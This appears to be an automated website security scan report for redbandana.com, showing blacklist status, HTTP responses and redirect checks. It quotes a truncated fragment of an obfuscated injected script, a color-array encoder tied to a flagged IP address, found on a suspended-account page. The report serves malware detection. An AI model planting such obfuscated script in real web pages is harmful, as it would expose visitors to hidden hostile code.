Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=redbandana.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://redbandana.com/ | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 17:44:36 GMT Location: http://redbandana.com/cgi-sys/suspendedpage.cgi Server: nginx/1.6.2 Content-Length: 295 Content-Type: text/html; charset=iso-8859-1 | clean |
http://redbandana.com/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 5083 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 86.55.140.203 if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000'); var redef_colors = 1; var colors_picked = 0; funct ...[1186 bytes skipped]... Decoded script: try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_colors() try_pick_c ...[17634 bytes skipped]... | ||
http://redbandana.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 17:44:38 GMT Location: http://redbandana.com/cgi-sys/suspendedpage.cgi Server: nginx/1.6.2 Content-Length: 295 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: redbandana.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 08 Mar 2015 17:44:36 GMT
Location: http://redbandana.com/cgi-sys/suspendedpage.cgi
Server: nginx/1.6.2
Content-Length: 295
Content-Type: text/html; charset=iso-8859-1
...295 bytes of data.
GET / HTTP/1.1
Host: redbandana.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 08 Mar 2015 17:44:36 GMT
Location: http://redbandana.com/cgi-sys/suspendedpage.cgi
Server: nginx/1.6.2
Content-Length: 295
Content-Type: text/html; charset=iso-8859-1
...295 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: redbandana.com
Referer: http://www.google.com/search?q=redbandana.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: redbandana.com
Referer: http://www.google.com/search?q=redbandana.com
Result:
The result is similar to the first query. There are no suspicious redirects found.